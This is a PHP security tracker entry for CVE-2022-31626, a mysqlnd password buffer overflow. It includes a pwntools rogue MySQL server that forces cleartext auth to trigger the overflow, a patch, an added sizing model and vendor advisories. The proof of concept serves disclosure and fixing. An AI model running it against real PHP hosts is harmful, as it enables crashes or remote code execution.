CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when the pdo_mysql extension is used with the mysqlnd driver, if a third party is allowed to supply both the host to connect to and the password for the connection, a password of excessive length can trigger a buffer overflow in PHP, which can lead to remote code execution.


Sec Bug #81719

mysqlnd/pdo password buffer overflow leading to RCE

Submitted: 2022-05-16 14:33 UTC
Modified: 2022-06-15 07:24 UTC
Votes: 11
Avg. Score: 3.0 ± 1.0
Reproduced: 2 of 2 (100.0%)
Same Version: 2 (100.0%)
Same OS: 2 (100.0%)
From: c dot fol at ambionics dot io
Assigned: cmb
Status: Closed
Package: PDO MySQL
PHP Version: 8.1.6
OS:
Private report: No
CVE-ID: 2022-31626

[2022-05-16 14:33 UTC] c dot fol at ambionics dot io

Description:

Hello PHP team!

INFOS

There’s a buffer overflow here: https://github.com/php/php-src/blob/master/ext/mysqlnd/mysqlnd_wireprotocol.c#L785

It copies `auth_data_len` bytes from `buffer + MYSQLND_HEADER_SIZE`, but only allocates `auth_data_len` bytes.

This bug affects mysqlnd and therefore PDO.

For context, this function copies the user submitted password (`packet->auth_data`) to a buffer in order to send it to a MySQL server. This happens with the legacy auth method that requires you to send a password as raw instead of having some kind of challenge/response logic.

This is exploitable remotely by making PHP connect to a rogue MySQL server. Tools such as Adminer, PHPmyAdmin are affected. Impact is remote code execution.

TEST SCRIPT

I’ve added a fake MySQL Server coded in python to demonstrate the bug at the bottom of this bug report. This should probably be removed before the bug goes public.

Install pwntools (https://github.com/Gallopsled/pwntools#readme), and start it. It’ll wait for connections. Then, you can start PHP in debug mode, with GDB and break on the indicated line:

```
$ gdb --args ./sapi/cli/php -r "new PDO('mysql:host=here.localhost', 'b', str_repeat('a', 5000));"
(gdb) b mysqlnd_wireprotocol.c:785
(gdb) r
```

As it breaks, you’ll see that the copy happens OOB.

PATCH

Just add the size of the header in the computation.

```

  • zend_uchar * const buffer = pfc->cmd_buffer.length >= packet->auth_data_len? pfc->cmd_buffer.buffer : mnd_emalloc(packet->auth_data_len);
  • size_t total_packet_size = packet->auth_data_len + MYSQLND_HEADER_SIZE;
  • zend_uchar * const buffer = pfc->cmd_buffer.length >= total_packet_size? pfc->cmd_buffer.buffer : mnd_emalloc(total_packet_size); ```
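Review bot: total_packet_size now drives both the cmd_buffer reuse test and the mnd_emalloc size, so the two can no longer disagree about the header, which is the right shape for this fix; what the hunk still lacks is a regression test. Note that the old comparison `pfc->cmd_buffer.length >= packet->auth_data_len` also let a password a few bytes shorter than the preallocated command buffer overrun that buffer (the header bytes are written in front of it), not only the freshly allocated one, so the test should cover a password just under the command-buffer size as well as the 5000-byte case from the report.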

Best regards, Charles Fol ambionics.io

```
#!/usr/bin/env python3
# Rogue MySQL server from the bug report, reflowed into runnable form.
# Hex payloads marked "elided" were stripped from this copy of the report.

from pwn import *


class ProtoError(Exception):
    def __init__(self):
        super().__init__('Unknown SQL command')


class Output:
    def clear(self):
        print('\r\x1b[K', end='')
        return self

    def __getattr__(self, x):
        # out.info(...), out.success(...), out.error(...) all format and print
        def wrapper(msg='', *args, **kwargs):
            return print(msg.format(*args), **kwargs)
        return wrapper


out = Output()


def failure(message):
    out.error(message)
    exit()


def zend_string_size(s):
    """When you create a PHP string of N bytes, it will allocate N+25 bytes."""
    return s - 24 - 1


class Handler:
    """Handles a connection to the fake MySQL server.

    When the client auths, we change the authentication method to cleartext
    to trigger the overflow. Otherwise, once we receive a packet, we send
    back what the client wants to hear.
    """

    def __init__(self, socket):
        self.socket = socket
        self.handle()

    def die(self):
        self.socket.close()

    def handle(self):
        try:
            self.handle_handshake()
            while self.handle_command() != 'quit':
                pass
        except ProtoError:
            raise
        except EOFError:
            # out.failure('EOF')
            pass
        except Exception as e:
            # out.failure('{}: {:}', type(e).__name__, str(e))
            raise
        finally:
            self.socket.close()

    def handle_command(self):
        packet = self.read_packet()
        command = packet[0]

        # Send query
        if command == 0x03:
            self.handle_query(packet[1:])
            return
        # Change DB
        if command == 0x02:
            # out.info('Change DB: {}', packet[1:].decode())
            self.send('07 00 00 01 00 00 00 02 00 00 00')
            return
        if command == 0x1b:
            # out.info('Unknown packet')
            self.send('05 00 00 01 fe 00 00 02 00')
            return
        # Quit
        if command == 0x01:
            # out.info('Closing connection')
            return 'quit'

    def send(self, data):
        self.socket.send(bytes.fromhex(data.replace(' ', '')))

    def read_packet(self):
        # MySQL packet header: 3-byte little-endian length + 1-byte sequence id
        packet_header = self.socket.recv(4)
        if len(packet_header) != 4:
            raise ProtoError()
        size = u32(packet_header) & 0xffffff
        contents = self.socket.recv(size)
        return contents

    def handle_handshake(self):
        # out.success('Got connection, authenticating...')
        # Server greeting (protocol v10, version "8.0.23", caching_sha2_password)
        self.send('4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf150000000000000000000077315b77715b5315523a274e0063616368696e675f736861325f70617373776f726400')
        self.read_packet()
        self.send('020000020103')
        # switch auth to cleartext password (pam)
        self.send('16000003FE6d7973716c5f636c6561725f70617373776f726400')
        self.read_packet()
        self.read_packet()
        # The overflow :)
        self.socket.recv(4)
        self.send('0700000500000002000000')

    def handle_query(self, query):
        # out.info('Query: {}', query.decode())
        if query.startswith(b'SET '):
            self.send('07 00 00 01 00 00 00 02 00 00 00')
        elif query.startswith(b'SELECT TABLE_NAME, TABLE_TYPE'):
            self.send('0100000102480000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f4e414d450a5441424c455f4e414d450cff0000010000fd8110000000480000030364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f545950450a5441424c455f545950450cff002c000000fe811100000005000004fe000002000d00000501610a42415345205441424c451000000604746573740a42415345205441424c4505000007fe00000200')
        elif query.startswith(b'SELECT @@default_storage_engine'):
            self.send('01000001012e0000020364656600000018404064656661756c745f73746f726167655f656e67696e65000cff0054550100fd00001f000005000003fe000002000700000406496e6e6f444205000005fe00000200')
        elif query.startswith(b'SHOW COLLATION'):
            # hex payloads elided in this copy of the report
            self.send('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')
            self.send('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')
        elif query.startswith(b'SHOW CREATE DATABASE'):
            self.send('01000001021e00000203646566000000084461746162617365000cff0000010000fd01001f000025000003036465660000000f437265617465204461746162617365000cff0000100000fd01001f000005000004fe000002008400000504746573747e43524541544520444154414241534520607465737460202f2a2134303130302044454641554c54204348415241435445522053455420757466386d623420434f4c4c41544520757466386d62345f303930305f61695f6369202a2f202f2a2138303031362044454641554c5420454e4352595054494f4e3d274e27202a2f05000006fe00000200')
        elif query.startswith(b'SELECT ROUTINE_NAME AS'):
            self.send('0100000104510000020364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530d53504543494649435f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000030364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000040364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f545950450c524f5554494e455f545950450cff0024000000fe815100000042000005036465660008524f5554494e455308524f5554494e45530e4454445f4944454e5449464945520e4454445f4944454e5449464945520cff00f4ffff0bfc80001f000005000006fe0000020005000007fe00000200')
        elif query.startswith(b'SHOW EVENTS'):
            # hex payload elided in this copy of the report
            self.send('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')
        elif query.startswith(b'SELECT TABLE_NAME AS Name'):
            self.send('01000001033c0000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c6573044e616d65044e616d650cff0000010000fd81100000003a0000030364656612696e666f726d6174696f6e5f736368656d61065441424c45530006456e67696e6506456e67696e650cff0000010000fd00000000003c0000040364656612696e666f726d6174696f6e5f736368656d61065441424c45530007436f6d6d656e7407436f6d6d656e740cff0000600000fc100000000005000005fe000002000a000006016106496e6e6f4442000d000007047465737406496e6e6f44420005000008fe00000200')
        elif query.startswith(b'SELECT /*+ MAX_'):
            self.send('01000001014e0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108736368656d6174610b534348454d415f4e414d450b534348454d415f4e414d450cff0000010000fd811000000005000003fe000022001300000412696e666f726d6174696f6e5f736368656d6106000005056d7973716c1300000612706572666f726d616e63655f736368656d61040000070373797305000008047465737405000009fe00002200')
        elif query.startswith(b'SHOW INDEX FROM `test`'):
            # hex payload elided in this copy of the report
            self.send('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')
        elif query.startswith(b'EXPLAIN PARTITIONS SELECT * FROM '):
            self.send('b2000001ff2804233432303030596f75206861766520616e206572726f7220696e20796f75722053514c2073796e7461783b20636865636b20746865206d616e75616c207468617420636f72726573706f6e647320746f20796f7572204d7953514c207365727665722076657273696f6e20666f72207468652072696768742073796e74617820746f20757365206e656172202753454c454354202a2046524f4d20746573742e7465737427206174206c696e652031')
        elif query.startswith(b'SELECT * FROM test.test'):
            # handle_select_test() is not included in the report
            self.handle_select_test()
        elif query.startswith(b'SHOW WARNINGS'):
            self.send('01000001031b00000203646566000000054c6576656c000cff001c000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000cff0000080000fd01001f000005000005fe0000020005000006fe00000200')
        else:
            hexdump(query)
            raise ProtoError()


class SQLServer:
    """Rogue MySQL server."""
    session_class = None

    def __init__(self):
        self.sessions = []
        # pwntools server(): one Handler per accepted connection
        self.socket = server(3306, callback=self.accept)

    def accept(self, client_socket):
        self.sessions.append(
            self.session_class(client_socket)
        )

    def set_session_handler(self, session_class):
        self.session_class = session_class

    def stop(self):
        self.socket.close()
        for session in self.sessions:
            session.die()


# named sql_server so it does not shadow pwntools' server() used above
sql_server = SQLServer()
sql_server.set_session_handler(Handler)

pause()
```
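The handshake the script above drives, and the buffer arithmetic behind the bug, as an added example that is not part of the bug report or of PHP's code. It decodes the two packets copied from handle_handshake (the server greeting and the AuthSwitchRequest to mysql_clear_password), frames the cleartext reply a client sends back, and models the two sizing rules from the patch so the ~5000-byte question from the thread can be answered for any command-buffer size. Assumptions: the v10 greeting layout and the "password followed by NUL" reply follow the MySQL wire protocol as documented; the command-buffer length 4096 is an illustrative value, not a claim about PHP's default; `auth_data_len` is treated abstractly as whatever byte count mysqlnd allocates for.

```python
"""Added example (not from the bug report): MySQL packet framing around the
auth-switch-to-cleartext trick, plus a model of the mysqlnd buffer sizing."""
import struct

MYSQLND_HEADER_SIZE = 4          # 3-byte payload length + 1-byte sequence id
AUTH_SWITCH_REQUEST = 0xFE       # first payload byte of an AuthSwitchRequest

# Packets copied from the reporter's rogue server (handle_handshake).
HANDSHAKE_HEX = ("4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf15"
                 "0000000000000000000077315b77715b5315523a274e00"
                 "63616368696e675f736861325f70617373776f726400")
AUTH_SWITCH_HEX = "16000003FE6d7973716c5f636c6561725f70617373776f726400"


def parse_packet(data: bytes):
    """Split one MySQL packet: returns (sequence_id, payload, remaining bytes)."""
    if len(data) < MYSQLND_HEADER_SIZE:
        raise ValueError("short header")
    length = int.from_bytes(data[:3], "little")
    seq = data[3]
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return seq, payload, data[4 + length:]


def build_packet(seq: int, payload: bytes) -> bytes:
    """Frame a payload with the 4-byte header the vulnerable code forgot to count."""
    if len(payload) >= 1 << 24:
        raise ValueError("payload needs multi-packet framing")
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def parse_handshake_v10(payload: bytes):
    """Return (server version, connection id, auth plugin) from a v10 greeting.

    Field layout assumed from the MySQL protocol docs: version string, 4-byte
    connection id, 8-byte scramble part 1, filler, capability low, charset,
    status, capability high, scramble length, 10 reserved bytes, scramble
    part 2, plugin name."""
    if payload[0] != 10:
        raise ValueError("not protocol v10")
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    pos += 4 + 8 + 1 + 2 + 1 + 2 + 2
    auth_len = payload[pos]
    pos += 1 + 10
    pos += max(13, auth_len - 8)
    plugin = payload[pos:payload.index(b"\x00", pos)].decode()
    return version, conn_id, plugin


def parse_auth_switch_request(payload: bytes):
    """Return (plugin name, plugin data) from an AuthSwitchRequest payload."""
    if payload[0] != AUTH_SWITCH_REQUEST:
        raise ValueError("not an AuthSwitchRequest")
    nul = payload.index(b"\x00", 1)
    return payload[1:nul].decode(), payload[nul + 1:]


def build_clear_password_response(seq: int, password: bytes) -> bytes:
    """Client reply after a switch to mysql_clear_password: password + NUL (assumed)."""
    return build_packet(seq, password + b"\x00")


def mysqlnd_auth_overflow(auth_data_len: int, cmd_buffer_len: int, patched: bool) -> int:
    """Bytes written past the destination by the auth-packet copy.

    Vulnerable rule (from the report): reuse cmd_buffer if its length >=
    auth_data_len, else allocate auth_data_len; then write auth_data_len bytes
    at offset MYSQLND_HEADER_SIZE. Patched rule: size on auth_data_len + header."""
    needed = auth_data_len + MYSQLND_HEADER_SIZE
    wanted = needed if patched else auth_data_len
    dest_len = cmd_buffer_len if cmd_buffer_len >= wanted else wanted
    return max(0, needed - dest_len)


if __name__ == "__main__":
    _, greeting, _ = parse_packet(bytes.fromhex(HANDSHAKE_HEX))
    print("server greeting:", parse_handshake_v10(greeting))
    _, switch, _ = parse_packet(bytes.fromhex(AUTH_SWITCH_HEX))
    print("auth switch to:", parse_auth_switch_request(switch)[0])
    for n in (100, 4095, 5000):
        print(f"password bytes={n}: overflow vulnerable={mysqlnd_auth_overflow(n, 4096, False)}"
              f" patched={mysqlnd_auth_overflow(n, 4096, True)}")
```

Two things the model makes visible that the thread only hints at: a password longer than the command buffer takes the fresh-allocation path and overruns it by exactly the four header bytes, and a password only slightly shorter than the command buffer (4093 to 4096 bytes with the illustrative 4096) overruns the preallocated buffer instead, because the reuse check also ignored the header.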


History


[2022-05-17 13:59 UTC] [email protected]

-Status: Open
+Status: Verified
-Assigned To:
+Assigned To: cmb

[2022-05-17 13:59 UTC] [email protected]

Thanks for reporting the issue (very thorough report)! I can reproduce the bug, and your patch would obviously solve that.

However, I'm having some issues with the server script, which apparently stalls at the end of the handshake (Handler.handle_handshake). It would be nice to commit that as a regression test, though (and also as the beginning of a more general fake server test suite); maybe you have an idea how to fix that.

Anyway, as I understand it, this issue would only happen for *very* long passwords (~ 5000 bytes or more); that would likely *not* qualify this as security issue. Or are there other more likely cases which may trigger this bug?

[2022-05-25 21:34 UTC] [email protected]

I think since it can be common for a hosted tool to accept a user-supplied password, and as the required length is not ridiculous (5k, not gigabytes), we should treat it as security.

[2022-05-25 21:40 UTC] [email protected]

-CVE-ID: needed
+CVE-ID: 2022-31626

[2022-05-31 13:43 UTC] c dot fol at ambionics dot io

Hello cmb,

Sorry for the delay, it looks like your tracker refuses to send me emails for this bug (although it works fine, usually). Have you made any progress regarding the server? I implemented this server a long time ago, so I don't really remember. I might be able to have a look next week if you're still stuck.

Regards

[2022-06-07 10:27 UTC] [email protected]

> Have you made any progress regarding the server ?

No, I didn’t work further on that. I think the problem is that the test would always hang, but it was sufficient to trigger the buffer overflow. Now that the bug is fixed, the test would need to proceed.

[2022-06-15 07:24 UTC] [email protected]

-Status: Verified
+Status: Closed

[2022-06-15 07:24 UTC] [email protected]

The fix for this bug has been committed. If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test. Thank you for the report, and for helping us make PHP better.

Related news

Gentoo Linux Security Advisory 202209-20

Gentoo Linux Security Advisory 202209-20 - Multiple vulnerabilities have been discovered in PHP, the worst of which could result in local root privilege escalation. Versions less than 7.4.30:7.4 are affected.

Red Hat Security Advisory 2022-5904-01

Red Hat Security Advisory 2022-5904-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include a buffer overflow vulnerability.

RHSA-2022:5904: Red Hat Security Advisory: php security update

An update for php is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

Ubuntu Security Notice USN-5479-3

Ubuntu Security Notice 5479-3 - USN-5479-1 fixed vulnerabilities in PHP. Unfortunately that update for CVE-2022-31625 was incomplete for Ubuntu 18.04 LTS. This update fixes the problem. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

Ubuntu Security Notice USN-5479-2

Ubuntu Security Notice 5479-2 - USN-5479-1 fixed vulnerabilities in PHP. This update provides the corresponding updates for Ubuntu 16.04 ESM. Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

Red Hat Security Advisory 2022-5491-01

Red Hat Security Advisory 2022-5491-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include buffer overflow and privilege escalation vulnerabilities.

RHSA-2022:5491: Red Hat Security Advisory: rh-php73-php security and bug fix update

An update for rh-php73-php is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Related CVEs:
* CVE-2021-21703: php: Local privilege escalation via PHP-FPM
* CVE-2021-21707: php: special character breaks path in xml parsing
* CVE-2022-31625: php: uninitialized array in pg_query_params() leading to RCE
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5468: Red Hat Security Advisory: php:8.0 security update

An update for the php:8.0 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Related CVEs:
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5467: Red Hat Security Advisory: php:7.4 security update

An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Related CVEs:
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

RHSA-2022:5471: Red Hat Security Advisory: php:7.4 security update

An update for the php:7.4 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Related CVEs:
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE

Ubuntu Security Notice USN-5479-1

Ubuntu Security Notice 5479-1 - Charles Fol discovered that PHP incorrectly handled initializing certain arrays when handling the pg_query_params function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. Charles Fol discovered that PHP incorrectly handled passwords in mysqlnd. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.
